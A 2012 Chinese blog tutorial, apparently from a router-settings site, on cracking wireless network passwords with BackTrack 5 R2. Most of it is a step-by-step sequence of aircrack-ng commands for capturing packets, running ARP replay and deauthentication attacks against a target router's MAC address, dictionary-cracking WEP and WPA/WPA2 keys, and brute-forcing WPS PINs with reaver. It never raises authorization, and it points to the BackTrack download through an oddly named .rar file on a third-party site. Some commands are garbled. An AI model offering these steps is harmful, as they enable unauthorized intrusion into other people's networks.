192.168.1.1-路由器设置 | 192.168.0.1-无线路由器设置

使用BT5 R2对无线网的密钥进行破解的方法

发布时间:2012-03-12 13:08

   对于无线网密钥进行破解,玩了快一个月了,软件都是基于linux系统的,BT系列也是linux系统的一个分支(很专业的网络检测系统),也试过CDlinux9.6和Beini五合一版本(网上据说不再更新了),最后还是选择了BT5 R2。
  BT系列对于大部分人来说是很难学会的,它完全不同与windows系统,它是一个以doc(命令)界面为主,辅之以图形界面的。命令很多,接下来就简单的讲讲无线网破解的一些基本命令(软件都是内置好的),如果不习惯命令式操作,可以自己去网上找minidwep(最简单的一个无线破解软件)的deb文件。
  back track5的下载地址:http://www.52tusiji.cn/19216811/devcon.rar
  可以通过vm虚拟机模拟(需要USB无线网卡,最好是卡皇,破解对wpa2信号要求很高) ,也可以通过U盘安装(需UNetbootin),直接通过BIOS设置进入即可,无需安装。(也可能不支持内置网卡,linux系统对PC的要求很变态,这点很像苹果系统)

  1. wep加密破解:

  ifconfig -a 查看所有的网卡

  ifconfig wlan0 up 激活无线网卡

  airmonairmon -ng start 设置无线网卡模式

  airodump-ng mon0 查看无线网络信息

  airodump-ng --ivs -w akast -c 6 mon0 抓包(-c是指频道,后面跟着我要破解的路由器的信号频道,也就是6)

  aireplay-ng -3 -b 00:21:27:63:41:CE -h 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-b后面跟着的是目标MAC地址。-h后面跟着的是本机的无线网卡MAC地址。)

  aircrack-ng akast*.ivs 开始破解

  2.wpa或wpa2破解(其实这两种加密方式并没有被完全破解,能破解运气占很大的成分)

  第一种是抓包后跑字典

  ifconfig -a 查看所有的网卡

  ifconfig wlan0 up 激活无线网卡

  airmonairmon -ng start 设置无线网卡模式

  airodump-ng mon0 查看无线网络信息

  airodump-ng -w akast -c 6 mon0 抓包

  aireplay-ng -0 1 -a 00:21:27:63:41:CE -c 00:1F:3C:5F:36:15 mon0 ARP request 攻击 (-a后面跟着的是目标MAC地址。-c后面跟着的是本机的无线网卡MAC地址。)

  aircrack-ng -w 密码字典akast*.cap 开始破解

  backtrack自带的密码列表:/pentest/wireless/aircrack-ng/lest/password.lst

  也可以在windows下用EWSA跑字典(利用CPU和GPU的,我电脑立马出现问题,不建议)

  第二种方法利用reaver进行pin解(也不是很可靠,拼人品的)

  ifconfig -a 查看所有的网卡

  ifconfig wlan0 up 激活无线网卡

  airmonairmon -ng start 设置无线网卡模式

  airodump-ng mon0 查看无线网络信息

  wash -i mon0 -C

  reaver -i mon0 -b MAC地址 -a -S -vv(如果出现timeout或者trying pin 12345670后不动了,可以重新试试)

  接下来说说其中有些英文表示的意思(不愿意看的直接略过)

  AP(无线网)

  BSSID——这个就是路由器的MAC地址了。

  PWR——这个是信号强度。

  Beacons——这个是路由器对外发包,可能是SSID广播。

  #Data——这个数据最最重要,这个代表可以用于破解的包,一般这个数据到达1W+,一般的64位的WEP密码就能够破解了。之后我们要做的,就是等待他到达1W,如果数据增长很缓慢(几分钟才增加1),那就只好用另一种方法了,就是发包攻击。

  #/s——DATA增加的速度。

  CH——频道,总共有11个频道,可以看到,我要破解的AP的频道是11。

  MB——无线的速度,现在一般都是54MB的了。

  CIPHER——加密方式。

  AUTH——这个应该是authorization的缩写,也就是授权的意思。

  ESSID——简单理解,这个就是路由器的名字了。

  最后说一句,最好有客户端在线(即有人在使用中),不然没有Data,平添不少难度。(feedbottle似乎可以,不过伪连对于信号要求似乎很高,我的小USB网卡能伪连,却无法发送数据包,郁闷!) (作者:野猫)

关于我们 - RSS地图 - 最近更新 - 友情链接 - 网站地图 - 版权声明